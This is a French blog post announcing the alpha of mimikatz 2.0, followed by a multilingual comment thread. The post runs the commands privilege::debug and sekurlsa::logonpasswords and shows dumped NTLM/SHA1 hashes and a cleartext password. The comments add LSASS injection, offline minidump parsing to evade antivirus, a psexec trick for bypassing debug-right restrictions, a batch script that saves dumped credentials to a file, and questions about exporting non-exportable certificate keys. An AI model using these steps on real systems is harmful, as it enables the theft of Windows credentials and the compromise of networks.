mimikatz

mimikatz 2.0 vient de sortir en version alpha

Pour les pressés cherchant des mots de passe…

A exécuter en administrateur :

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

271 réflexions au sujet de « mimikatz »

  1. Ping : effeciently dumping Windows password hashes « Daniel Weis's I.T Security Blog

  2. Ping : effeciently dumping Windows password hashes - Daniel Weis - Blogs - Telligent

  3. Ping : Dis9 Team » Dump Windows password hashes efficiently

  4. Ping : Mimikatz Contraseñas de Windows « Seguridad y Redes

  5. Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) « sanchezdiego.com.ar

  6. Ping : Latino » Blog Archive » Mimikatz Contraseñas de Windows

  7. Ping : Dumping Cleartext Credentials with Mimikatz « Daniel Weis's I.T Security Blog

  8. Ping : Dumping Cleartext Credentials with Mimikatz - Daniel Weis - Blogs - Telligent

  9. Ping : Security News « CyberOperations

  10. Ping : mimikatz: Tool To Recover Cleartext Passwords From Lsass – Dacheng Luo

  11. Ping : Jeremiah Grossman, Security News – Episode 278 » 華人資安論壇與資安認知教育網誌

  12. Ping : FeiFei's Blog » 获取Windows系统明文密码神器

  13. Ping : 调试器神器 – mimikatz-获取windows处于active状态账号明文密码[转] | Vision's Blog

  14. Ping : 轻量级神器 mimikatz – 直接抓取 Windows 明文密码! - Firedli's Blog

  15. Ping : 通杀WIN服务器得明文密码神器

  16. Ping : Outils, services, sites à (re)découvrir 2012 S08 | La Mare du Gof

  17. secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
    Remove Administrators/System
    This is also how you stop Pass-The-hash from working too.
    I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 640
    Erreur : Impossible d’injecter ! ; (0×00000008) Not enough storage is available to process this command.
    Same wtih Win7(64-bit) only the hex is different
    Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

    • Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
      Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
      -william

    • 0×00000008 is from NT 5 RDP session, not because debug right removed ;)
      in both case : psexec -s XXX … no need of debug right, and bypass session isolation in RDP ;)

  18. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

  19. Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

  20. Ping : 转:windows下轻量级调试神器—mimikatz – 2哥博客|H3CIE|网络技术|数据中心|路由交换|网络安全|黑客技术|CCIE|Linux|服务器|wordpress

  21. Ping : 神器mimikatz使用命令方法总结 | Vision's Blog

  22. Ping : mimikatz的使用方法总结 « Crackerban Team

  23. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! « x7z|关注网络安全|Web安全|最新0day漏洞|网站安全顾问

  24. Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
    -mandingo-

  25. Ping : Unsung Heros (the list) « Cатсн²² (in)sесuяitу / ChrisJohnRiley

  26. C:\Program Files\WinRAR\ts\Win32>mimikatz.exe
    mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
    // http://blog.gentilkiwi.com/mimikatz
    
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
    
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 452
    Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足,无法处理此命令。
    
    mimikatz #

    help me

  27. FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
    -mandingo-

  28. Ping : Drunken Security News – Episode 279 » 信息安全播客

  29. Ping : Tonya Bacam, Security Onion – Episode 279 » 華人資安論壇與資安認知教育網誌

  30. Ping : Live from CCDC – Episode 280 » 華人資安論壇與資安認知教育網誌

  31. Ping : Recuperando contraseñas de Windows en texto plano (I de II)

  32. Ping : 牛X神器-mimikatz | Yoio's Blog

  33. Ping : 欺天: NLP | HACK | 社会工程学 | 金融

  34. Ping : Remotely Recovering Windows Passwords in Plain Text « CYBER ARMS – Computer Security

  35. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Linglin'S Blog

  36. Ping : Episode 647 – Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS | InfoSec Daily

  37. Ping : Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM) | GEEKNOPATAS

  38. Пополним коллекцию благодарностей на иностранных языках :)
    Спасибо!

  39. Ping : Pw » 关注互联网技术,专注于信息安全,记录生命点滴故事.

  40. Ping : Recovering Windows Passwords Remotely in Plain Text | IT Security

  41. Ping : mimikatz获取Windows系统明文密码神器 | 网络大学|Network University

  42. Ping : Mimikatz creator to Speak at PH Days Conference « CYBER ARMS – Computer Security

  43. LOL,C’est un logiciel qui peut faire beaucoup de trucs,ça me plais beaucoup ^.^
    mais il y a trop de méthodes TT,chaque fois je dois venir ici pour chercher le rappel ,peut-être c’est moi qui me suis trompé ,puisque la langue française est compliqué pour nous ,toute façon il faut apprendre .
    Bon courage et je vous souhaite une très bonne année 2012 .

  44. Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

    • No problem with ASLR ;) It must be unicode or incorect unicode string for computer account, but appear to be valid in unicode… :( (try chcp before ;))
      Why did you use psexec for get system ? you can use privilege::debug

      • Yes, privilege::debug worked better. On this PC, I was only able to retrieve my smartcard PIN, because I don’t log in with my password. :)

      • Yeah — it showed just the portion of the PIN that I type to login/unlock my PC. It did not of course display the automatically changing code that is shown on the LCD display. :)

  45. Note that I must have recently unlocked my PC in order for the RSA SecureID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :
            tspkg :         n.t. (LUID KO)
    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;618713
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    
    Authentification Id         : 0;613648
    Package d'authentification  : Kerberos
    Utilisateur principal       : demoUser
    Domaine d'authentification  : FakeDomain
            msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
            wdigest :       THIS_IS_MY_RSA_PIN
            tspkg :         n.t. (LUID KO)
    • So funny :), maybe you can try @getLogonPasswords full for « full » informations.
      Is your NTLM(RSA_PIN) same as msv1_0 NTLM hash ?

      I’m @PHDays, unfortunately I cannot test it now :)

      • That’s a good question… I’ll have to crack it with something like ighashgpu. Since I know what it is, it should be pretty easy to crack the hash. :)

      • You don’t have to do that !
        whent it’s available, take the cleartext pin code , hash it in NTLM, compare :)

  46. Sorry, I got distracted with other things…

    No it’s odd – mimikatz will dump my SecureID PIN as the « wdigest » but the corresponding NTLM hash does not match either the PIN or my user account password. I don’t know what it is.

  47. Ping : Security News #0×11: Take Hold of the Flame « CyberOperations

  48. Ping : Recovering Clear Text Passwords – Updates « CYBER ARMS – Computer Security

  49. i download your source code .but i find something could not find ,link the function GetMSVLogonData, can you show how does it work ? thank you ! :)

  50. Ping : 神器mimikatz使用方法 | Individual World

  51. Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀xp win2003 win7 win2008 初体验 | 执魄's Blog

  52. Ping : 神器mimikatz | WG1博客

  53. Ping : 抓Windows系统的明文密码 - F19ht's blog

  54. Ping : Làm thế nào để đồng bộ Active Directory Sync trong khi Username và Password bị mã hoá theo OS 32/64bit ? (tiếp theo) | Thangletoan’s Weblog

  55. Ping : 神器mimikatz | 冰锋刺客

  56. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | Startend.Blog's

  57. Ping : 神器mimikatz | 潇湘博客

  58. Ping : mimikatz - 网站安全,服务器安全,防御检测

  59. Ping : Password Cracking « Aggressive Virus Defense

  60. mimikatz вещь зачётная!
    Посмотрел презентацию, увидел слово СПАСИБО!
    т.ч. может поймёшь) Большое спасибо тебе!

  61. Ping : 问君几多愁 » msf中使用MIMIKATZ

  62. Ping : 神器 – mimikatz | 小兮博客

  63. Ping : Lóránd Somogyi » Openconnect replacement for Cisco AnyConnect on Linux (Ubuntu)

  64. Ping : Grab Windows Password In Plain Text!!!

  65. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码 | 小i博客

  66. Ping : 如何获取已登录账户的Windows密码 | lzsb.me

  67. Mimikatz FTW! Allowed me to circumvent my IT department’s issuing of a new RSA certificate when I changed my home PC, thus saving much time and stress. Merci!

  68. Ping : Windows 8 Clear Text Passwords from Locked Desktop with Mimikatz « CYBER ARMS – Computer Security

  69. Ping : Saber la pass del ADMIN « 3lhacker – Comunidad Informatica

  70. Bonjour,

    Pour info, mimikatz ne fonctionne pas sous windows 2003 enterprise (english) en version pré-servicepack.
    “The procedure entry point EncodePointer could not be located in the dynamic link library KERNEL32.dll”. La version de la dll est 5.2.3790.

    Cela fonctionne bien une fois le SP2 installé (SP1 non testé).

    Un grand merci pour l’outil!

  71. Ping : 2012 in Review and a Look Forward to 2013

  72. 这全是鸟语啊,外国的黑客,你们好!你说的我完全不懂昂,真不知道你们的鸟语,你怎么学会的呢!

  73. Ping : Metasploit: Postexploitation – Passwort im Klartext auslesen | freie-welt.com

  74. Ping : 本机Windows密码查看神器-mimikatz | 千行站

  75. Ping : Metasploit: Postexploitation – Passwort im Klartext auslesen | freie-welt.com

  76. Ping : Jak na export privatniho klice certifikatu, kdyz je oznacen jako non-exportable | logon

  77. Ping : 直接爆WIN2003+服务器的管理员密码的Mimikatz软件 | 紫云残雪's Blog

  78. Ping : Hacking Windows with Password Grabbing | ColeSec Security

  79. Ping : Remotely Recovering Windows Passwords in Plain Text « ITSolutionDesign

  80. Ping : .:[ d4 n3wS ]:. » Mimikatz

  81. Ping : 神器mimikatz使用命令方法总结 | rambowind

  82. Ping : 扫雷神器 – mimikatz

  83. Ping : Obtener contraseña de administrador de Windows desde el propio Windows | DURKH3IM'S BLOG

  84. Ping : mimikatz-en (English Translation of Mimikatz) Release « AttackVector.org

  85. Ping : 法国黑客神器 mimikatz 直接读取管理员密码 通杀Win系 – 思安阁

  86. Ping : Wouter Veugelen blog » English version of Mimikatz: Mimikatz-en.exe

  87. Ping : WCE and Mimikatz in memory over meterpreter | Justin - Blog

  88. Ping : mimikatz | Blog de Gentil Kiwi | opexxxblog

  89. Can you attack remote PC’s with this or you have to be on the actual clients machine to run this? You would also need to have admin rights I’m assuming.

    Good tool, now just trying to see if it can be executed to gain access to a remote pc. I’m the IT guy at work.

    Keep up the good work.

  90. Ping : Reflective DLL Injection with PowerShell | clymb3r

  91. Ping : [Intermédiaire] Récupérer un mot de passe Windows avec Mimikatz | Yoann's Workshop

  92. Ping : Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1 | clymb3r

  93. Ping : [Sécurité] Mimikatz | aurelienantonoff

  94. Microsoft Forefront is detecting the Alpha as well as RC of Mimikatz, is there a way we can run it without encrypting the exe to bypass the AV.

  95. What commandline format in new alpha version ?

    mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt

    in batch mode is crash

  96. Ping : 記某次主機提權 | Dave's Blog

  97. Ping : Goading Around Firewalls | Strategic Cyber LLC

  98. Ping : Dumping Clear Text Credentials from Windows | GSR8 Blog

  99. Ping : PTSec – Portal de Segurança Português » [Tutorial] Passwords do Windows XP, 7, 8 em plaintext

  100. Ping : Mimikatz & WCE & Metasploit

  101. Ping : mimikatz – Clear Text Passwords | Hacking Defined

  102. Will I be able to export a Certificate along with it’s private key even if the key isn’t exportable and import the Certificate to another computer?

    Thanks.

      • Well is there any way that you know for sure? I need to format my computer and reinstall windows, but before I do, I want to make sure that I will be able to use my certificate again.

        Is there a way to do this?

        Thanks.

  103. Ping : 如何导出Windows哈希系列一- FreebuF.COM

  104. Ping : Export Non-exportable Certificate Keys from store

  105. Ping : 如何导出Windows哈希系列一 | GERFALKE

  106. Ping : Chinadu`s Blog » 如何导出Windows哈希系列一

  107. Hi mate, awesome tool. any chance it will be able to dump domain user hashes (usually from ActiveDirectory) in NTLM / LM format? I have yet to find a program which is lightweight or small that can do it would be great man!

    keep it up!

  108. Ping : Are “unexportable” certificates a real security measure or just security theater? - Just just easy answers

  109. Ping : Recovering Plain Text Passwords with Metasploit and Mimikatz | CYBER ARMS - Computer Security

  110. Ping : Cannot export certificate with private key? | Frederick Dicaire

  111. why is it that I cannot unzip these binaries? Am I missing something? Tyring to use it in conjunction with USB rubber ducky and it doesn’t seem to want to unzip with 7zip or RAR

  112. mimikatz # sekurlsa::minidump c.dmp
    Switch to MINIDUMP
    
    mimikatz # sekurlsa::logonPasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) !=
     PROCESSOR_ARCHITECTURE_INTEL (0)
    ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
    
    mimikatz #
  113. I’m struggling with 2.0 version in order to export certificates. The « crypto::certifcates » only lists me certificates stores, but no idea how to export… Please advice

  114. Hi, thank you for this tool. What can you do with high protected certificates?
    Do you know what function verifies the password for export private key?

  115. Hey =)
    it is posible to use mimikatz with a Ram Dump?
    If not, this would be a nice feature.

    Greets from Germany
    Chris

      • Thanks, but i only have complete images in RAW Format. Do you know any way to extract passwords out of that?
        and could you PLEASE PLEASE PLEASE write your error messages in english =( ?

      • MANY THANKS TO YOU to Programm the WinDbg extension!!! i saw a post yesterday on twitter with a comment to with extension, today i checked it out. It is VERY NICE! a had a little Fight with the wow64exts in WinDbg but finally it Worked! Many thanks an greets from Germany!
        Greets Chris

  116. Ping : Hash传递攻击Windows2012远程桌面 | Panni_007 Security

  117. Ping : 【Windows】利用mimikatz解出登入中使用者密碼 | Lun

  118. Ping : Dumping passwords in a VMware .vmem file - Remko Weijnen's Blog (Remko's Blog)

  119. Ping : The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1 « Alex Ionescu’s Blog

  120. Ping : TEKNOLOJİ : Bellekten Parolaların Elde Edilmesi – 2 | YÜKSEK STRATEJİ

  121. Excellent l’information pour le hash SHA1 DPAPI! Reste encore la question comment il est généré depuis Windows Vista, vu que ce n’est plus « simplement » SHA1(UNICODE(mot de passe))?

  122. Ping : Using CVE 2013-5065 | s0ze.com

  123. Ping : Достаём пароли от всех активных учетных записей на windows 7 и 2008 | soft-spy.ru

  124. (sorry I write in English, mon français n’est pas très bon)

    I’ve seen that Windows 8.1 is supported in alpha 2.0 version.
    However, clear password dump is not available anymore.

    Is because of a new protection (or a better handle) of Windows 8.1?

    I have found no information regarding the new countermeasures in Windows 8.1.

    Do you have any information about this regards?

    And congrats for the great and so useful tool!

    • mimikatz dumps password when they’re in memory, when they’re not…. ;)

      Windows 8.1 does not keep passwords in memory as usual. Only LiveSSP as I’ve seen (or when you enable Credentials Delegations)

  125. Having a buggy issue with mimikatz alpha 2.0 x64 and Windows 8.1 enterprise.

    When using either procdump with sekurlsa::minidump… or mimikatz alone to pull lsass.exe… I do not get any passwords from a Windows 8.1 x64 system that has just been logged into. No errors, just « password: (null) » everywhere I would expect a password.

    If I lock the system, and unlock using a password… then run procdump or mimikatz again… I DO get a correct password.
    It seems the first logon password is not stored in lsass process memory, or not at the offset that mimikatz is looking. But subsequent credential input is properly retrieved (such as lock and unlock).
    In Windows 7 x64… works perfectly. Can pull passwords from very first logon.

    • As you’ve seen, this is not a mimikatz issue ; Windows 8.1 does not store « by default » passwords in memory (see previous comment)
      Like in NT5 with Kerberos provider, some passwords fields are populated after unlocking.

      You can check this with : sekurlsa::searchpasswords.
      It searches the whole process for credentials, and it’s provider / offset independent.

  126. I am using the new version. I try to export a certificate from the computer store, but cannot figure out how to change the store. Is there a way to do this?
    Thank you for the tool,
    -D

    mimikatz # crypto::stores
    Asking for System Store ‘CERT_SYSTEM_STORE_CURRENT_USER’ (0×00010000)

  127. Has something changed with the new version?

    It used to work on my Win7 Enterprise 64bit, but suddenly not anymore. (running the 64bit version). It looks like the password is still hashed / encrypted.. Anyone else have this problem? Other than that, excellent tool, much respect!

    Merci pour ton feedback!

    Output example (I replaced some info with XXXXXXXXXX)

    User Name         : XXXXXXXXXX
    Domain            : NT Service
    SID               : S-1-5-80-997390408-XXXXXXXXXX-3119169589-2253446180-22265637
    86
            msv :
             [00000003] Primary
             * Username : XXXXXXXXXX
             * Domain   : UK
             * LM       : 00000000000000000000000000000000
             * NTLM     : 3bdf6dc3f414a299b1acfdaa80d8030d
             * SHA1     : 3b6264001febc9917d700cb04f1307667fcfb050
            tspkg :
             * Username : XXXXXXXXXX
             * Domain   : UK
             * Password : b2 28 3b f5 eb 00 d3 31 1f 4b 57 1d 86 ca 1f ca 8f c1 36 a
    1 cf e0 73 20 70 a6 47 12 de 25 37 b8 48 9c 3f 3e 06 03 64 d0 5c e6 cd 28 fc d3
    38 ac 08 a0 bc bb 5a bf b7 7b d3 0b 92 7b 56 32 26 c0 d8 b0 f1 8a ce cb b5 df ce
     a4 36 69 b8 be f7 55 4a 03 05 8b a7 79 d8 de 11 06 5e e3 27 9d f7 9f 81 dd a0 2
    a 1f 83 3b a2 75 ee 08 7d e3 a5 cf 17 29 73 77 8a d8 dc 59 8f 3d 09 70 f9 1a d5
    1a 23 5c fa 03 7b b0 18 d4 3f da d4 1e 94 2d 0b b1 e7 6f f1 f3 1e a7 ab 21 0a 36
     c6 64 05 5e 11 cf 9a cf f5 42 f6 c9 ed 0d ee a9 4a 3a 6c 44 cf d5 f1 c8 fd eb 3
    6 a6 93 ee c5 14 d1 6f b1 0e 01 30 44 3c 3d 3d c4 30 e4 77 e8 5e 12 7a 8f ee 60
    c2 3d dd 84 a5 6a 75 07 32 ff bd 84 84 8f ff 8c 17 a1 54 7a fe dc 52 74 b9 cb 6e
     d2 62 6c d6 ec 35 b6
    • Hi Michel,

      Services passwords, computers passwords, and some others are not necessary « human readable ». Nobody type them ! so in some cases Windows generates random « binary » passwords !

      In your case b2 28 3b f5 [...] d6 ec 35 b6 is the real binary passwords =)

      const BYTE pwd[] = {0xb2, 0x28, 0x3b, 0xf5, [...], 0xd6, 0xec, 0x35, 0xb6};
      SHA_CTX shactxInput;
      SHA_DIGEST shaInput;
      
      A_SHAInit(&shactxInput);
      A_SHAUpdate(&shactxInput, pwd, sizeof(pwd));
      A_SHAFinal(&shactxInput, &shaInput);
      
      kull_m_string_wprintf_hex(shaInput.digest, SHA_DIGEST_LENGTH, 1);

      Output is : 3b 62 64 00 1f eb c9 91 7d 70 0c b0 4f 13 07 66 7f cf b0 50, your SHA1 ;)
      mimikatz credentials output routine try to detect if the password is a printable string, if not, it display it in hex.

  128. Hello again!

    Thanks so much for the quick reply! This still leaves me with a couple of questions though:
    1) I thought Mimikatz would look for the password stored in memory, which is supposed to be cleartext.
    2) Mimikatz used to work on my computer perfectly, and suddenly it only produces hashes (Is the previous version of Mimikatz still available somewhere?)
    3) A SHA1 hash is (I think) very hard to decrypt, so Mimikatz doesn’t always work on all systems?

    Thanks again for the feedback!

    Cordialement, Michel

    • Mes excuses! J’ai vu que je peux encore retrouver le mot de passe avec la nouvelle version MK :) Vous pouvez supprimer mes deux commentaires si vous voulez.

      Merci de nouveau et bàt, Michel.

  129. Ping : HackLab

    • Yep, depuis Avril 2012… heureusement le code source est disponible ;)
      Pour Symantec, ce que j’avais adoré à l’époque :
      « The tool allows an attacker to perform the following actions on the computer:

      • Cheat at minesweeper. »
  130. I love Mimikatz it is a great tool.

    I like to procdump memory and then use the minidump function to process the dump off the client so even if Mimikatz is picked up by AV and cant be run locally it will still work! ;-)

    But I sometimes get a « MAJOR VERSION » error.

    Is this because I am using the wrong version of Mimikatz?

    Or does it mean that I am trying to work with a version of windows such as XP which doesnt natively have the Tkspg, Wdigest or Kerberos TGT functionality and it is the version of Windows that is wrong?

  131. Ping : Security News #0×68 | CyberOperations

  132. Ping : PowerShell Magazine » Accidental Sabotage: Beware of CredSSP

  133. Ping : 神器mimikatz发布2.0 | Jarett's Blog

  134. Ping : Logging on as Domain Admin to end user workstations? Think again! | Tailspintoys – 365lab.net

  135. Ping : Exporting the not exportable – on the topic of Windows crypto key storage | Notes on open source and random ramblings

  136. Ping : procdump与mimikatz绕过杀毒软件读取密码 | Ends

  137. Ping : 神器mimikatz发布2.0_安全工具-十堰网络安全研究中心

  138. Ping : CARA MENGETAHUI PASSWORD LOGIN ADMINISTRATOR PADA SISTEM OPERASI WINDOWS | NEWBIE26 INSIDE

  139. Ping : Backdoor в Active Directory - Mimikatz Golden Ticket | Levinkv's Blog - Информационная БезопасностьLevinkv's Blog – Информационная Безопасность

  140. Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? - Hedgehog Security

  141. Ping : Remote Desktop’s Restricted Admin: Is the Cure Worse Than the Disease? | GeekTime

  142. If I dont run privilege::debug I get « ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005″. Is there somewhere in your blog explaining whats going on here that requires it to be run first?

  143. Ping : How to Break Windows 8 Picture Password Security | Windows 8 Password

  144. Ping : EXTRAYENDO CONTRASEÑAS DE LA RAM CON MIMIKATZ 2.0 | SECTRACK DOMINICANA

  145. Ping : 轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! | 旭达网络科技(深圳)有限公司专业架设各种服务器

  146. Ping : Windows Logon Password – Get Windows Logon Password using Wdigest in Memory Dump | Forensic Focus - Articles

  147. Ping : 三菱東京UFJに蔑まれているMacでBizSTATIONを使う | 高橋文樹.com

  148. Ping : Meterpreter Kiwi Extension: Golden Ticket HOWTO | Strategic Cyber LLC

  149. Ping : Anonyme

  150. Ping : Retrive windows password in cleartext | Technical guides by Gsec.se

  151. Ping : Mimikatz: A nasty little piece of awesomeness | Deep InfoSec

  152. Ping : 神器mimikatz 2.0 - 中国X黑客小组

  153. Ping : Adli Bilişim İncelemelerinde Mimikatz İle Şifre Elde Etme | Halil ÖZTÜRKCİ

  154. Ping : Exploit a Windows system memory and get clear text passwords

  155. Ping : 强制抓取本机登录密码 神器mimikatz2.0发布 | 老D

  156. Ping : Windows密码抓取神器mimikatz2.0发布 - Z 's

  157. Ping : Windows密码抓取神器mimikatz2.0 | 扯蛋

  158. Ping : The path to the Golden Ticket | Count Upon Security

  159. Ping : Export non-exportable certificate – DotMS

  160. Ping : PowerShell Magazine » PowerSploit

  161. Ping : PowerShell Magazine » Owning Networks and Evading Incident Response with PowerShell

  162. Ping : 密码抓取神器mimikatz2.0发布 | 七行者博客

  163. Ping : Sacar las contraseñas de Windows con mimikatz. | SmythSys IT Consulting

  164. save this file as anyname.bat and run as administrator with CMD.
    @echo off
    For /f « tokens=2-4 delims=/  » %%a in (‘date /t’) do (set mydate=%%c-%%a-%%b)
    For /f « tokens=1-2 delims=/: » %%a in (‘time /t’) do (set mytime=%%a%%b)
    mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%

  165. Ping : The Evolution of Protected Processes – Part 1: Pass-the-Hash Mitigations in Windows 8.1 | My Website

  166. Ping : Cached Domain Credentials in Vista/7 (AKA Why Full Drive Encryption is Important) - Hedgehog Security

  167. Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! – WordPress

  168. Ping : Recopilación de herramientas de seguridad informática | Seguridad Informatica

  169. Ping : Lista com ferramentas de segurança e pentest | Mundo Tecnológico

  170. Ping : Sthack 4.0 : Confs & Ctf in Bordeaux ! | WordPress

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>